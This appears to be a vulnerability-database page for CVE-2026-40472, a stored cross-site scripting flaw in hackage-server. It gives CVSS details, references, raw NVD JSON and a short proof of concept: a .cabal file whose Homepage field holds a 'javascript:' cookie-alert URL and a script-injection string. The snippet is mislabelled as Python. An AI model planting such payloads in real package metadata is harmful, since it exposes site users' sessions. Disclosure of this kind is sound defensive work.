CVE-2026-40472 CVSS 9.9 CRITICAL

CVE-2026-40472

Published: 2026-04-23 16:16:26

Last Modified: 2026-04-24 14:41:56

Source: 74b3a70d-cca6-4d34-9789-e83b222ae3be

Description

In hackage-server, user-controlled metadata from .cabal files are rendered into HTML href attributes without proper sanitization, enabling stored Cross-Site Scripting (XSS) attacks.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

hackage-server (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

-- Example of a malicious .cabal file metadata field
Name:                PoCPackage
Version:             1.0.0.0
Synopsis:            Proof of Concept for CVE-2026-40472
Description:         This package demonstrates the XSS vulnerability.
Homepage:            javascript:alert(document.cookie)
-- Alternatively, using event handlers in URL context if applicable
-- Homepage:            "><script>alert('XSS')</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40472
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40472
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40472/
[4] VulDB https://vuldb.com/cve/CVE-2026-40472
[5] https://osv.dev/vulnerability/HSEC-2026-0004

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40472", "sourceIdentifier": "74b3a70d-cca6-4d34-9789-e83b222ae3be", "published": "2026-04-23T16:16:25.753", "lastModified": "2026-04-24T14:41:55.890", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In hackage-server, user-controlled metadata from .cabal files are rendered into HTML\nhref attributes without proper sanitization, enabling stored\nCross-Site Scripting (XSS) attacks."}], "metrics": {"cvssMetricV31": [{"source": "74b3a70d-cca6-4d34-9789-e83b222ae3be", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "74b3a70d-cca6-4d34-9789-e83b222ae3be", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://osv.dev/vulnerability/HSEC-2026-0004", "source": "74b3a70d-cca6-4d34-9789-e83b222ae3be"}]}}